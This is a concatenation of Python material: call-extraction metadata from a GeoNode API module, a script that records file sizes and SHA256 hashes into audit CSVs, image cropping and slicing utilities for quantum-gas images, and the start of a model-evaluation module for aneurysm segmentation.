35504), 'django.forms.models.model_to_dict', 'model_to_dict', (['obj'], {'fields': 'self.VALUES'}), '(obj, fields=self.VALUES)\n', (35479, 35504), False, 'from django.forms.models import model_to_dict\n'), ((38168, 38191), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (38189, 38191), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((38757, 38795), 'django.forms.models.model_to_dict', 'model_to_dict', (['obj'], {'fields': 'self.VALUES'}), '(obj, fields=self.VALUES)\n', (38770, 38795), False, 'from django.forms.models import model_to_dict\n'), ((40791, 40814), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (40812, 40814), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((6481, 6485), 'django.db.models.Q', 'Q', (['f'], {}), '(f)\n', (6482, 6485), False, 'from django.db.models import Q\n'), ((10690, 10713), 'django.db.models.Q', 'Q', ([], {'bbox_y0__gte': 'bbox[1]'}), '(bbox_y0__gte=bbox[1])\n', (10691, 10713), False, 'from django.db.models import Q\n'), ((16728, 16752), 'haystack.query.SQ', 'SQ', ([], {'date__gte': 'date_start'}), '(date__gte=date_start)\n', (16730, 16752), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16874, 16896), 'haystack.query.SQ', 'SQ', ([], {'date__lte': 'date_end'}), '(date__lte=date_end)\n', (16876, 16896), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((23369, 23415), 
'django.contrib.staticfiles.templatetags.staticfiles.static', 'staticfiles.static', (['settings.MISSING_THUMBNAIL'], {}), '(settings.MISSING_THUMBNAIL)\n', (23387, 23415), False, 'from django.contrib.staticfiles.templatetags import staticfiles\n'), ((25570, 25604), 'tastypie.utils.mime.build_content_type', 'build_content_type', (['desired_format'], {}), '(desired_format)\n', (25588, 25604), False, 'from tastypie.utils.mime import build_content_type\n'), ((26743, 26785), 'geonode.base.models.ResourceBase.objects.filter', 'ResourceBase.objects.filter', ([], {'featured': '(True)'}), '(featured=True)\n', (26770, 26785), False, 'from geonode.base.models import ResourceBase\n'), ((28722, 28752), 'django.utils.translation.gettext', '_', (['obj.category.gn_description'], {}), '(obj.category.gn_description)\n', (28723, 28752), True, 'from django.utils.translation import gettext as _\n'), ((33128, 33162), 'tastypie.http.HttpBadRequest', 'http.HttpBadRequest', ([], {'reason': 'reason'}), '(reason=reason)\n', (33147, 33162), False, 'from tastypie import http\n'), ((33729, 33763), 'tastypie.http.HttpBadRequest', 'http.HttpBadRequest', ([], {'reason': 'reason'}), '(reason=reason)\n', (33748, 33763), False, 'from tastypie import http\n'), ((34109, 34133), 'django.http.HttpResponse', 'HttpResponse', ([], {'status': '(200)'}), '(status=200)\n', (34121, 34133), False, 'from django.http import HttpResponse\n'), ((34410, 34434), 'geonode.layers.models.Layer.objects.distinct', 'Layer.objects.distinct', ([], {}), '()\n', (34432, 34434), False, 'from geonode.layers.models import Layer\n'), ((35814, 35844), 'django.utils.translation.gettext', '_', (['obj.category.gn_description'], {}), '(obj.category.gn_description)\n', (35815, 35844), True, 'from django.utils.translation import gettext as _\n'), ((37180, 37225), 'django.forms.models.model_to_dict', 'model_to_dict', (['layer'], {'fields': 'map_layer_fields'}), '(layer, fields=map_layer_fields)\n', (37193, 37225), False, 'from django.forms.models import model_to_dict\n'), ((38051, 38073), 'geonode.maps.models.Map.objects.distinct', 'Map.objects.distinct', ([], {}), '()\n', (38071, 38073), False, 'from geonode.maps.models import Map\n'), ((39105, 39135), 'django.utils.translation.gettext', '_', (['obj.category.gn_description'], {}), '(obj.category.gn_description)\n', (39106, 39135), True, 'from django.utils.translation import gettext as _\n'), ((40664, 40691), 'geonode.documents.models.Document.objects.distinct', 'Document.objects.distinct', ([], {}), '()\n', (40689, 40691), False, 'from geonode.documents.models import Document\n'), ((9028, 9047), 'django.db.models.Q', 'Q', ([], {'dirty_state': '(True)'}), '(dirty_state=True)\n', (9029, 9047), False, 'from django.db.models import Q\n'), ((10616, 10639), 'django.db.models.Q', 'Q', ([], {'bbox_x0__gte': 'bbox[0]'}), '(bbox_x0__gte=bbox[0])\n', (10617, 10639), False, 'from django.db.models import Q\n'), ((10642, 10665), 'django.db.models.Q', 'Q', ([], {'bbox_x1__lte': 'bbox[2]'}), '(bbox_x1__lte=bbox[2])\n', (10643, 10665), False, 'from django.db.models import Q\n'), ((17275, 17299), 'haystack.query.SQ', 'SQ', ([], {'bbox_right__lte': 'left'}), '(bbox_right__lte=left)\n', (17277, 17299), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((20149, 20191), 'django.http.Http404', 'Http404', (['"""Sorry, no results on that page."""'], {}), "('Sorry, no results on that page.')\n", (20156, 20191), False, 'from django.http import Http404\n'), ((21381, 21415), 're.search', 're.search', (['"""_exact$|_sortable$"""', 
'k'], {}), "('_exact$|_sortable$', k)\n", (21390, 21415), False, 'import re\n'), ((28901, 28946), 'geonode.groups.models.GroupProfile.objects.get', 'GroupProfile.objects.get', ([], {'slug': 'obj.group.name'}), '(slug=obj.group.name)\n', (28925, 28946), False, 'from geonode.groups.models import GroupProfile\n'), ((35993, 36038), 'geonode.groups.models.GroupProfile.objects.get', 'GroupProfile.objects.get', ([], {'slug': 'obj.group.name'}), '(slug=obj.group.name)\n', (36017, 36038), False, 'from geonode.groups.models import GroupProfile\n'), ((39284, 39329), 'geonode.groups.models.GroupProfile.objects.get', 'GroupProfile.objects.get', ([], {'slug': 'obj.group.name'}), '(slug=obj.group.name)\n', (39308, 39329), False, 'from geonode.groups.models import GroupProfile\n'), ((8882, 8901), 'django.db.models.Q', 'Q', ([], {'dirty_state': '(True)'}), '(dirty_state=True)\n', (8883, 8901), False, 'from django.db.models import Q\n'), ((10762, 10792), 'geonode.layers.models.Layer.objects.order_by', 'Layer.objects.order_by', (['"""srid"""'], {}), "('srid')\n", (10784, 10792), False, 'from geonode.layers.models import Layer\n'), ((13253, 13269), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (13267, 13269), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((14002, 14027), 'haystack.query.SQ', 'SQ', ([], {'content__exact': 'phrase'}), '(content__exact=phrase)\n', (14004, 14027), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((14121, 14161), 're.split', 're.split', (['"""\\\\W"""', 'query'], {'flags': 're.UNICODE'}), "('\\\\W', query, flags=re.UNICODE)\n", (14129, 14161), False, 'import re\n'), ((15424, 15440), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (15438, 15440), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16476, 16492), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (16490, 16492), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16662, 16678), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (16676, 16678), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16808, 16824), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (16822, 16824), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17064, 17080), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17078, 17080), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17227, 17251), 'haystack.query.SQ', 'SQ', ([], {'bbox_left__gte': 'right'}), '(bbox_left__gte=right)\n', (17229, 17251), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17420, 17436), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17434, 17436), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((26163, 26206), 'geonode.base.models.ResourceBase.objects.polymorphic_queryset', 'ResourceBase.objects.polymorphic_queryset', ([], {}), '()\n', (26204, 26206), False, 'from geonode.base.models import ResourceBase\n'), ((10041, 10064), 'django.db.models.Q', 'Q', ([], {'name__iexact': 'keyword'}), '(name__iexact=keyword)\n', (10042, 10064), False, 'from django.db.models import Q\n'), ((10067, 10090), 'django.db.models.Q', 'Q', ([], {'slug__iexact': 'keyword'}), '(slug__iexact=keyword)\n', (10068, 10090), False, 'from django.db.models import Q\n'), ((10169, 10201), 'geonode.base.models.HierarchicalKeyword.get_tree', 'HierarchicalKeyword.get_tree', (['kw'], {}), '(kw)\n', (10197, 10201), False, 'from geonode.base.models import HierarchicalKeyword\n'), 
((11220, 11248), 'django.db.models.Q', 'Q', ([], {'bbox_y1__lte': 'proj_bbox[3]'}), '(bbox_y1__lte=proj_bbox[3])\n', (11221, 11248), False, 'from django.db.models import Q\n'), ((13375, 13391), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (13389, 13391), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((13834, 13850), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (13848, 13850), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((13904, 13927), 'haystack.query.SQ', 'SQ', ([], {'title__exact': 'phrase'}), '(title__exact=phrase)\n', (13906, 13927), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((13950, 13979), 'haystack.query.SQ', 'SQ', ([], {'description__exact': 'phrase'}), '(description__exact=phrase)\n', (13952, 13979), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((15867, 15883), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (15881, 15883), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16293, 16309), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (16307, 16309), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17131, 17155), 'haystack.query.SQ', 'SQ', ([], {'bbox_top__lte': 'bottom'}), '(bbox_top__lte=bottom)\n', (17133, 17155), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17179, 17203), 'haystack.query.SQ', 'SQ', ([], {'bbox_bottom__gte': 'top'}), '(bbox_bottom__gte=top)\n', (17181, 17203), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17553, 17569), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17567, 17569), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((25830, 25846), 'tastypie.utils.trailing_slash', 'trailing_slash', ([], {}), '()\n', (25844, 25846), False, 'from tastypie.utils import trailing_slash\n'), ((11164, 11192), 'django.db.models.Q', 'Q', ([], {'bbox_y0__gte': 'proj_bbox[1]'}), '(bbox_y0__gte=proj_bbox[1])\n', (11165, 11192), False, 'from django.db.models import Q\n'), ((17669, 17685), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17683, 17685), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((11102, 11130), 'django.db.models.Q', 'Q', ([], {'bbox_x0__gte': 'proj_bbox[0]'}), '(bbox_x0__gte=proj_bbox[0])\n', (11103, 11130), False, 'from django.db.models import Q\n'), ((11133, 11161), 'django.db.models.Q', 'Q', ([], {'bbox_x1__lte': 'proj_bbox[2]'}), '(bbox_x1__lte=proj_bbox[2])\n', (11134, 11161), False, 'from django.db.models import Q\n'), ((14359, 14375), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (14373, 14375), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((17813, 17829), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17827, 17829), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((14599, 14615), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14602, 14615), False, 'from haystack.inputs import Raw\n'), ((17966, 17982), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (17980, 17982), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((18102, 18118), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (18116, 18118), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((14477, 14493), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14480, 14493), False, 'from haystack.inputs import Raw\n'), ((14540, 14556), 'haystack.inputs.Raw', 
'Raw', (['search_word'], {}), '(search_word)\n', (14543, 14556), False, 'from haystack.inputs import Raw\n'), ((15008, 15024), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (15011, 15024), False, 'from haystack.inputs import Raw\n'), ((15310, 15326), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (15313, 15326), False, 'from haystack.inputs import Raw\n'), ((14886, 14902), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14889, 14902), False, 'from haystack.inputs import Raw\n'), ((14949, 14965), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (14952, 14965), False, 'from haystack.inputs import Raw\n'), ((15188, 15204), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (15191, 15204), False, 'from haystack.inputs import Raw\n'), ((15251, 15267), 'haystack.inputs.Raw', 'Raw', (['search_word'], {}), '(search_word)\n', (15254, 15267), False, 'from haystack.inputs import Raw\n')]
|
#!/usr/bin/env python2
from __future__ import print_function
import csv
import datetime
import errno
import hashlib
import os
import sys
import traceback
import zipfile
AUDIT_CSV_PATH = "audit.csv"
AUDIT_ZIPFILES_CSV_PATH = "audit_with_zipfile_entries.csv"
AUDIT_CSV_FIELDNAMES = ["path", "size", "last_modified_time", "sha256"]
AUDIT_ZIPFILES_CSV_FIELDNAMES = ["path", "entry_filename", "size", "sha256"]
def get_size_and_sha256(infile):
"""
Returns the size and SHA256 checksum (as hex) of the given file.
"""
h = hashlib.sha256()
size = 0
while True:
chunk = infile.read(8192)
if not chunk:
break
h.update(chunk)
size += len(chunk)
return (size, h.hexdigest())
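# Example usage (illustrative only; the file name is hypothetical):
#     with open("archive.zip", "rb") as f:
#         size, digest = get_size_and_sha256(f)
# The file is read in 8 KiB chunks, so arbitrarily large files never need to fit in memory.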
def get_file_paths_under(root):
"""Generates the paths to every file under ``root``."""
if not os.path.isdir(root):
raise ValueError("Cannot find files under non-existent directory: %r" % root)
for dirpath, _, filenames in os.walk(root):
for f in filenames:
if os.path.isfile(os.path.join(dirpath, f)):
yield os.path.join(dirpath, f)
def get_existing_audit_entries():
"""
Returns a list of all the entries already saved in ``AUDIT_CSV_PATH``.
"""
try:
with open(AUDIT_CSV_PATH) as infile:
return list(csv.DictReader(infile))
except IOError as err:
if err.errno == errno.ENOENT:
with open(AUDIT_CSV_PATH, "w") as outfile:
writer = csv.DictWriter(outfile, fieldnames=AUDIT_CSV_FIELDNAMES)
writer.writeheader()
return []
else:
raise
def get_existing_audit_zip_entries(path):
"""
Returns a list of all the entries already saved in ``AUDIT_ZIPFILES_CSV_PATH``
that match ``path``.
"""
try:
with open(AUDIT_ZIPFILES_CSV_PATH) as infile:
return [entry for entry in csv.DictReader(infile) if entry["path"] == path]
except IOError as err:
if err.errno == errno.ENOENT:
with open(AUDIT_ZIPFILES_CSV_PATH, "w") as outfile:
writer = csv.DictWriter(
outfile, fieldnames=AUDIT_ZIPFILES_CSV_FIELDNAMES
)
writer.writeheader()
return []
else:
raise
def get_paths_to_audit(root):
"""
Generates a list of paths that should be audited.
"""
existing_audit_paths = {e["path"] for e in get_existing_audit_entries()}
for path in get_file_paths_under(root):
# These files are of no consequence. We can ignore them.
if os.path.basename(path) in {".DS_Store", "Thumbs.db"}:
continue
if path in existing_audit_paths:
continue
yield path
def record_audit_for_zipfile_entries(path):
"""
Record audit information for all the entries in a zipfile.
"""
assert path.endswith(".zip")
    existing_zip_entry_names = {e["entry_filename"] for e in get_existing_audit_zip_entries(path)}
with open(AUDIT_ZIPFILES_CSV_PATH, "a") as outfile:
writer = csv.DictWriter(outfile, fieldnames=AUDIT_ZIPFILES_CSV_FIELDNAMES)
with zipfile.ZipFile(path) as zf:
for info in zf.infolist():
if info.filename in existing_zip_entry_names:
continue
with zf.open(info) as entry:
size, sha256 = get_size_and_sha256(entry)
writer.writerow(
{
"path": path,
"entry_filename": info.filename,
"size": size,
"sha256": sha256,
}
)
def record_audit_for_path(path):
"""
Record audit information for a single file.
"""
with open(AUDIT_CSV_PATH, "a") as outfile:
writer = csv.DictWriter(outfile, fieldnames=AUDIT_CSV_FIELDNAMES)
stat = os.stat(path)
with open(path, "rb") as infile:
size, sha256 = get_size_and_sha256(infile)
        mtime = stat.st_mtime
last_modified_time = datetime.datetime.fromtimestamp(mtime).isoformat()
writer.writerow(
{
"path": path,
"size": size,
"last_modified_time": last_modified_time,
"sha256": sha256,
}
)
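# Illustrative only: after a run, audit.csv holds one row per file in the form
#   path,size,last_modified_time,sha256
#   photos/2019/img_001.jpg,482113,2019-07-04T12:31:08,9f2c...   (made-up example values)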
if __name__ == "__main__":
try:
root = sys.argv[1]
except IndexError:
sys.exit("Usage: %s <ROOT>" % __file__)
for path in get_paths_to_audit(root=root):
print(path)
try:
if path.endswith(".zip"):
record_audit_for_zipfile_entries(path)
record_audit_for_path(path)
except Exception as exc:
with open("exceptions.log", "a") as outfile:
outfile.write("Exception while trying to audit %r:\n\n" % path)
traceback.print_exc(file=outfile)
outfile.write("\n---\n\n")
|
[
"traceback.print_exc",
"zipfile.ZipFile",
"os.stat",
"os.path.basename",
"os.path.isdir",
"csv.DictReader",
"os.walk",
"hashlib.sha256",
"datetime.datetime.fromtimestamp",
"os.path.join",
"sys.exit",
"csv.DictWriter"
] |
[((539, 555), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (553, 555), False, 'import hashlib\n'), ((991, 1004), 'os.walk', 'os.walk', (['root'], {}), '(root)\n', (998, 1004), False, 'import os\n'), ((850, 869), 'os.path.isdir', 'os.path.isdir', (['root'], {}), '(root)\n', (863, 869), False, 'import os\n'), ((3118, 3183), 'csv.DictWriter', 'csv.DictWriter', (['outfile'], {'fieldnames': 'AUDIT_ZIPFILES_CSV_FIELDNAMES'}), '(outfile, fieldnames=AUDIT_ZIPFILES_CSV_FIELDNAMES)\n', (3132, 3183), False, 'import csv\n'), ((3899, 3955), 'csv.DictWriter', 'csv.DictWriter', (['outfile'], {'fieldnames': 'AUDIT_CSV_FIELDNAMES'}), '(outfile, fieldnames=AUDIT_CSV_FIELDNAMES)\n', (3913, 3955), False, 'import csv\n'), ((3972, 3985), 'os.stat', 'os.stat', (['path'], {}), '(path)\n', (3979, 3985), False, 'import os\n'), ((2638, 2660), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (2654, 2660), False, 'import os\n'), ((3198, 3219), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (3213, 3219), False, 'import zipfile\n'), ((4100, 4113), 'os.stat', 'os.stat', (['path'], {}), '(path)\n', (4107, 4113), False, 'import os\n'), ((4515, 4554), 'sys.exit', 'sys.exit', (["('Usage: %s <ROOT>' % __file__)"], {}), "('Usage: %s <ROOT>' % __file__)\n", (4523, 4554), False, 'import sys\n'), ((1064, 1088), 'os.path.join', 'os.path.join', (['dirpath', 'f'], {}), '(dirpath, f)\n', (1076, 1088), False, 'import os\n'), ((1343, 1365), 'csv.DictReader', 'csv.DictReader', (['infile'], {}), '(infile)\n', (1357, 1365), False, 'import csv\n'), ((4152, 4190), 'datetime.datetime.fromtimestamp', 'datetime.datetime.fromtimestamp', (['mtime'], {}), '(mtime)\n', (4183, 4190), False, 'import datetime\n'), ((1113, 1137), 'os.path.join', 'os.path.join', (['dirpath', 'f'], {}), '(dirpath, f)\n', (1125, 1137), False, 'import os\n'), ((1512, 1568), 'csv.DictWriter', 'csv.DictWriter', (['outfile'], {'fieldnames': 'AUDIT_CSV_FIELDNAMES'}), '(outfile, fieldnames=AUDIT_CSV_FIELDNAMES)\n', (1526, 1568), False, 'import csv\n'), ((1934, 1956), 'csv.DictReader', 'csv.DictReader', (['infile'], {}), '(infile)\n', (1948, 1956), False, 'import csv\n'), ((2137, 2202), 'csv.DictWriter', 'csv.DictWriter', (['outfile'], {'fieldnames': 'AUDIT_ZIPFILES_CSV_FIELDNAMES'}), '(outfile, fieldnames=AUDIT_ZIPFILES_CSV_FIELDNAMES)\n', (2151, 2202), False, 'import csv\n'), ((4956, 4989), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'outfile'}), '(file=outfile)\n', (4975, 4989), False, 'import traceback\n')]
|
"""
Created on Mon Sep 9 15:51:35 2013
QgasUtils: Basic Quantum Gas Utilities functions
@author: ispielman
Modified on Wed Dec 10 11:26: 2014
@author: aputra
"""
import numpy
import scipy.ndimage
def ImageSlice(xVals, yVals, Image, r0, Width, Scaled = False):
"""
Produces a pair of slices from image of a band with 'Width' centered at r0 = [x y]
Scaled : 'False' use pixels directly, and 'True' compute scaling from (xvals and yvals) assuming
they are linearly spaced
Currently Width and x,y are in scaled units, not pixel units.
the return will be ((xvals xslice) (yvals yslice)), where each entry is a numpy array.
these are copies, not views.
"""
if (Scaled):
(xMin, yMin) = numpy.floor(GetPixelCoordsFromImage(r0, - Width/2, xVals, yVals));
(xMax, yMax) = numpy.ceil(GetPixelCoordsFromImage(r0, Width/2, xVals, yVals));
else:
(xMin, yMin) = r0 - numpy.round(Width/2);
(xMax, yMax) = r0 + numpy.round(Width/2);
# Extract bands of desired width
# These are slices, so views of the initial data
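    # Keep the band edges inside the image bounds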
if xMin<0: xMin =0
if yMin<0: yMin =0
if xMax>xVals.shape[1]: xMax = xVals.shape[1]
if yMax>yVals.shape[0]: yMax = yVals.shape[0]
# Compute averages
ySlice = Image[:,xMin:xMax].mean(1); # along y, so use x center
xSlice = Image[yMin:yMax,:].mean(0); # along x, so use y center
yValsSlice = yVals[:,0].copy();
xValsSlice = xVals[0,:].copy();
return ((xValsSlice, xSlice), (yValsSlice, ySlice));
def ImageCrop(xVals, yVals, Image, r0, Width, Scaled = False, Center = True):
"""
    Crops an image, along with the associated matrices of x and y values,
    to a specified area and returns the cropped image.
    The result is a copy, not a view.
Image, xVals, yVals : (2D image, xvals, yvals)
r0 : center of ROI in physical units (two element list or array)
Width : length of box-sides in physical units (two element list or array)
Scaled : If true, will attempt to use the x and y waves, to generate pixel values
Center : Recenter on cropped region
"""
error = False;
Cropped_Image={'OptDepth':0,'xVals':0,'yVals':0,'Error':error}
if (Scaled):
if(ScaleTest(xVals, yVals)):
rMinPixel = numpy.floor(GetPixelCoordsFromImage(r0, -Width/2, xVals, yVals));
rMaxPixel = numpy.ceil(GetPixelCoordsFromImage(r0, Width/2, xVals, yVals));
else:
rMinPixel = numpy.floor(r0)-numpy.floor(Width/2);
rMaxPixel = numpy.ceil(r0)+numpy.ceil(Width/2);
error = True;
else:
rMinPixel = numpy.floor(r0)-numpy.floor(Width/2);
rMaxPixel = numpy.ceil(r0)+numpy.ceil(Width/2);
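    # Clamp the crop window to the image bounds (pixel indices)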
if rMinPixel[0]<0: rMinPixel[0]=0
if rMinPixel[1]<0: rMinPixel[1]=0
if rMaxPixel[0]>xVals.shape[1]: rMaxPixel[0] = xVals.shape[1]
if rMaxPixel[1]>yVals.shape[0]: rMaxPixel[1] = yVals.shape[0]
Cropped_Image['OptDepth'] = Image[rMinPixel[1]:rMaxPixel[1],rMinPixel[0]:rMaxPixel[0]].copy();
Cropped_Image['xVals'] = xVals[rMinPixel[1]:rMaxPixel[1],rMinPixel[0]:rMaxPixel[0]].copy();
Cropped_Image['yVals'] = yVals[rMinPixel[1]:rMaxPixel[1],rMinPixel[0]:rMaxPixel[0]].copy();
if (Center):
Cropped_Image['xVals'] -= r0[0];
Cropped_Image['yVals'] -= r0[1];
return Cropped_Image;
def ImageSliceFromMax(Image, width, pScale = True):
"""
    Produces a pair of slices from Image['OptDepth'] of a band with 'width' centered at the maximum of the (smoothed) image.
    pScale : 'False' use pixels directly, and 'True' compute scaling from Image['xVals'] and Image['yVals'] assuming
    they are linearly spaced.
    Currently width and the center are in scaled units, not pixel units.
    The return is a dict with keys 'xVals', 'yVals', 'xSlice', 'ySlice', 'xMax' and 'yMax', where each slice is a numpy array.
    These are copies, not views.
"""
Z = scipy.ndimage.gaussian_filter(Image['OptDepth'], sigma=3);
id = Z.argmax()
r0max = (numpy.ravel(Image['xVals'])[id], numpy.ravel(Image['yVals'])[id])
imgSlice = ImageSlice(Image['xVals'], Image['yVals'], Image['OptDepth'], r0max, width, Scaled = pScale)
imgSlicefromMax={'xVals':0,'yVals':0,'xSlice':0, 'ySlice':0, 'xMax':r0max[0], 'yMax':r0max[1]}
imgSlicefromMax['yVals'] = imgSlice[1][0]
imgSlicefromMax['xVals'] = imgSlice[0][0]
imgSlicefromMax['ySlice'] = imgSlice[1][1]
imgSlicefromMax['xSlice'] = imgSlice[0][1]
return imgSlicefromMax
def GetPixelCoordsFromImage(r0, Offset, xVals, yVals):
"""
Returns the pixel coordinates associated with the scaled values in the 2D arrays xVals and yVals
remember in r0 the ordering is r0 = (x0, y0)
"""
# Assume that the correct arrays were passed
dy = yVals[1][0] - yVals[0][0];
dx = xVals[0][1] - xVals[0][0];
y0 = yVals[0][0];
x0 = xVals[0][0];
#want offset to be an integer number of pixels
Offset = numpy.round(Offset/numpy.array([dx,dy]));
return (r0 - numpy.array([x0, y0])) /numpy.array([dx, dy])+Offset;
def ScaleTest(xVals, yVals):
"""
    Checks that the 2D arrays xVals and yVals have non-zero spacing along their
    respective axes, i.e. that pixel coordinates can be derived from them.
"""
# Assume that the correct arrays were passed
dy = yVals[1][0] - yVals[0][0];
dx = xVals[0][1] - xVals[0][0];
if ((dx == 0) or (dy == 0)):
print("ImageSlice: generating scaled axes failed");
print(dx,dy,xVals[0][1],xVals[0][0],yVals[1][0],yVals[0][0],xVals,yVals)
return False;
else:
return True;
|
[
"numpy.ceil",
"numpy.ravel",
"numpy.floor",
"numpy.array",
"numpy.round"
] |
[((936, 958), 'numpy.round', 'numpy.round', (['(Width / 2)'], {}), '(Width / 2)\n', (947, 958), False, 'import numpy\n'), ((986, 1008), 'numpy.round', 'numpy.round', (['(Width / 2)'], {}), '(Width / 2)\n', (997, 1008), False, 'import numpy\n'), ((2672, 2687), 'numpy.floor', 'numpy.floor', (['r0'], {}), '(r0)\n', (2683, 2687), False, 'import numpy\n'), ((2688, 2710), 'numpy.floor', 'numpy.floor', (['(Width / 2)'], {}), '(Width / 2)\n', (2699, 2710), False, 'import numpy\n'), ((2730, 2744), 'numpy.ceil', 'numpy.ceil', (['r0'], {}), '(r0)\n', (2740, 2744), False, 'import numpy\n'), ((2745, 2766), 'numpy.ceil', 'numpy.ceil', (['(Width / 2)'], {}), '(Width / 2)\n', (2755, 2766), False, 'import numpy\n'), ((4000, 4027), 'numpy.ravel', 'numpy.ravel', (["Image['xVals']"], {}), "(Image['xVals'])\n", (4011, 4027), False, 'import numpy\n'), ((4033, 4060), 'numpy.ravel', 'numpy.ravel', (["Image['yVals']"], {}), "(Image['yVals'])\n", (4044, 4060), False, 'import numpy\n'), ((4958, 4979), 'numpy.array', 'numpy.array', (['[dx, dy]'], {}), '([dx, dy])\n', (4969, 4979), False, 'import numpy\n'), ((5025, 5046), 'numpy.array', 'numpy.array', (['[dx, dy]'], {}), '([dx, dy])\n', (5036, 5046), False, 'import numpy\n'), ((2518, 2533), 'numpy.floor', 'numpy.floor', (['r0'], {}), '(r0)\n', (2529, 2533), False, 'import numpy\n'), ((2534, 2556), 'numpy.floor', 'numpy.floor', (['(Width / 2)'], {}), '(Width / 2)\n', (2545, 2556), False, 'import numpy\n'), ((2580, 2594), 'numpy.ceil', 'numpy.ceil', (['r0'], {}), '(r0)\n', (2590, 2594), False, 'import numpy\n'), ((2595, 2616), 'numpy.ceil', 'numpy.ceil', (['(Width / 2)'], {}), '(Width / 2)\n', (2605, 2616), False, 'import numpy\n'), ((5001, 5022), 'numpy.array', 'numpy.array', (['[x0, y0]'], {}), '([x0, y0])\n', (5012, 5022), False, 'import numpy\n')]
|
import os
import json
import multiprocessing
from matplotlib import pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import matplotlib as mpl
import pandas as pd
import matplotlib.animation
from sklearn.model_selection import train_test_split
from tqdm import tqdm
from typing import List
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from torch.utils.data import Dataset, DataLoader
from scipy.spatial import distance_matrix
import nibabel as nib
from scipy.ndimage.interpolation import zoom
from scipy import ndimage
from sklearn.metrics import jaccard_score
from skimage.metrics import hausdorff_distance
from scipy.stats import pearsonr
from aneurysm_utils.preprocessing import resize_mri
from aneurysm_utils.environment import Environment
from collections import defaultdict
from sklearn import metrics as sk_metrics
from sklearn.preprocessing import MinMaxScaler
#import open3d
def evaluate_model(
y_true: list, y_pred: list, segmentation: bool = None, prefix: str = None
) -> dict:
metrics = {}
if segmentation:
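        # Flatten the per-volume masks into 1D label vectors before scoring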
y_true = np.concatenate(y_true).ravel()
y_pred = np.concatenate(y_pred).ravel()
if not prefix:
prefix = ""
else:
prefix = prefix + "_"
metrics[prefix + "accuracy"] = sk_metrics.accuracy_score(y_true, y_pred)
metrics[prefix + "bal_acc"] = sk_metrics.balanced_accuracy_score(y_true, y_pred)
try:
metrics[prefix + "precision"] = sk_metrics.precision_score(y_true, y_pred)
metrics[prefix + "recall"] = sk_metrics.recall_score(y_true, y_pred)
metrics[prefix + "spec"] = sk_metrics.recall_score(y_true, y_pred, pos_label=0)
metrics[prefix + "sen"] = sk_metrics.recall_score(y_true, y_pred, pos_label=1)
metrics[prefix + "f1"] = sk_metrics.f1_score(y_true, y_pred)
except Exception:
print(
"precision/recall/spec/sen/f1 are not supported for non-binary classification."
)
print("Accuracy (" + prefix + "): " + str(metrics[prefix + "accuracy"]))
